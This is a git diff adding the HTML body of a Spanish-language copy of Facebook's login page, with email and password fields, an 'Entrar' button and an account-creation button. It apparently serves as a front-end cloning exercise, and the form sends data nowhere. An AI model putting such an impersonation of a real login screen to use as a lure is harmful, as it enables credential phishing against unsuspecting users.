--- a/index.Html
+++ b/index.Html
@@ -2,15 +2,60 @@
 <html lang="en">
 
 <head>
-    <meta charset="UTF-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="stylesheet" href="Styles/style.css">
-    <title>Facebook - Inicia sesión</title>
+  <meta charset="UTF-8">
+  <meta http-equiv="X-UA-Compatible" content="IE=edge">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <link rel="stylesheet" href="Styles/style.css">
+  <title>Facebook - Inicia sesión</title>
 </head>
 
 <body>
-
+  <div class="container-fluid">
+    <div class="container">
+      <div class="row">
+        <div class="col">
+          <div class="pt-3">
+            <!--padding-->
+            <img src="images/sloganfacebook.svg" alt="Sogan facebook" class="img mt-2" />
+            <h3 class="ml-5 mt-3">
+              Facebook te ayuda a comunicarte y compartir con las personas que
+              forman parte de tu vida.
+            </h3>
+          </div>
+        </div>
+        <div class="col">
+          <div class="container-form border-0">
+            <div class="content-form">
+              <form class="form_f">
+                <div class="container-input">
+                  <input id="email" type="email" class="form-control pt-3 pb-3" id="exampleInputEmail1"
+                    placeholder="Correo electrónico o número de teléfono" aria-describedby="emailHelp" required />
+                </div>
+                <div class="container-input">
+                  <input id="contraseña" type="password" class="form-control pt-3 pb-3" id="exampleInputPassword1"
+                    placeholder="Contraseña" required />
+                </div>
+                <button id="btn-env" type="submit" class="btn btn-primary">
+                  <b>Entrar</b>
+                </button>
+                <div class="container-password">
+                  <a id="link" href="">¿Has olvidado la contraseña?</a>
+                </div>
+                <hr class="line-part" />
+                <button class="btn-newaccount btn btn-primary">
+                  <b class="text-btn">Crear nueva cuenta</b>
+                </button>
+              </form>
+            </div>
+            <div class="text-per">
+              <span><b>Crea una página</b> para un famoso, una marca o una
+                empresa.</span>
+            </div>
+          </div>
+        </div>
+      </div>
+    </div>
+  </div>
 </body>
 
 </html>
